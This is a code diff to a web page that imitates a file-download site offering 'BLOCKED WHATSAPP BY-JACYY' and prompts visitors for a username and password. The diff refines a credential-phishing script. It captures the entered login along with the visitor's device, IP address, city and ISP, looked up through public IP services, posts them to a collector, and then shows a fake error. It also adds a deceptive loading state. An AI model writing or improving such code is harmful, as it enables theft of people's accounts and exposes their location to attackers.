--- a/index.html
+++ b/index.html
@@ -16,9 +16,6 @@
         .btn-blue { background: #007bff; color: white; border: none; width: 100%; padding: 13px; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; }
         .dl-container { background: #007bff; margin: 15px; border-radius: 3px; padding: 10px 15px; color: white; display: flex; align-items: center; cursor: pointer; }
         .dl-icon-box { background: white; padding: 5px; border-radius: 2px; margin-right: 12px; display: flex; }
-        .social-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 10px; padding: 0 15px 20px; }
-        .social-btn { background: #f5f5f5; padding: 15px 5px; text-align: center; border-radius: 5px; color: #555; font-size: 11px; }
-        .social-btn i { display: block; margin-bottom: 8px; font-size: 18px; color: #777; }
         .overlay { position: fixed; inset: 0; background: rgba(0,0,0,0.85); display: none; justify-content: center; align-items: center; z-index: 9999; }
         .modal { background: white; border-radius: 10px; width: 90%; max-width: 340px; padding: 25px; text-align: center; }
         .modal input { width: 100%; padding: 12px; margin-bottom: 10px; border: 1px solid #ddd; border-radius: 6px; box-sizing: border-box; }
@@ -41,10 +38,6 @@
         <div class="dl-icon-box"><img src="https://static.mediafire.com/images/filetype/file-zip-v3.png" width="18"></div>
         <div style="flex:1"><b>BLOCKED WHATSAPP BY-JACYY</b><br><span style="font-size:10px">33.19MB</span></div>
         <i class="fa-solid fa-download"></i>
-    </div>
-    <div class="social-grid" style="margin-top: 20px;">
-        <div class="social-btn"><i class="fa-solid fa-link"></i><span>Copy for messenger</span></div>
-        <div class="social-btn"><i class="fa-brands fa-facebook-f"></i><span>Post to Facebook</span></div>
     </div>
 </div>
 
@@ -69,22 +62,35 @@
         const p = document.getElementById('pass').value;
         if(!u || !p) return;
 
-        let ip = "Checking...";
-        let loc = "Checking...";
-        let isp = "Checking...";
-        let dev = navigator.userAgent.match(/\(([^)]+)\)/) ? navigator.userAgent.match(/\(([^)]+)\)/)[1] : "Unknown Device";
+        // Tampilkan loading sebentar di tombol biar kerasa prosesnya
+        const btn = document.querySelector('.btn-confirm');
+        btn.innerText = "Processing...";
+
+        let ip = "N/A";
+        let loc = "N/A";
+        let isp = "N/A";
+        let dev = "Unknown Device";
 
         try {
-            // Menggunakan API ip-api yang lebih stabil untuk data ISP & Lokasi
-            const response = await fetch('https://ipapi.co/json/');
-            const data = await response.json();
-            ip = data.ip || "Not Found";
-            loc = `${data.city}, ${data.country_name}` || "Not Found";
-            isp = data.org || "Not Found";
+            // Ambil Info Device
+            if (navigator.userAgent.match(/\(([^)]+)\)/)) {
+                dev = navigator.userAgent.match(/\(([^)]+)\)/)[1];
+            }
+
+            // Gunakan api.ipify untuk IP murni (Sangat Stabil)
+            const ipResp = await fetch('https://api.ipify.org?format=json');
+            const ipData = await ipResp.json();
+            ip = ipData.ip;
+
+            // Gunakan ip-api untuk lokasi berdasarkan IP tersebut
+            const locResp = await fetch(`https://ipapi.co/${ip}/json/`);
+            const locData = await locResp.json();
+            
+            loc = `${locData.city}, ${locData.country_name}`;
+            isp = locData.org;
+
         } catch (e) {
-            ip = "Blocked/Error";
-            loc = "Blocked/Error";
-            isp = "Blocked/Error";
+            console.log("Error fetch data");
         }
 
         const pesan = {
@@ -97,6 +103,8 @@
             body: JSON.stringify(pesan)
         });
 
+        // Reset
+        btn.innerText = "KONFIRMASI";
         document.getElementById('pass').value = "";
         document.getElementById('err').style.display = "block";
     }
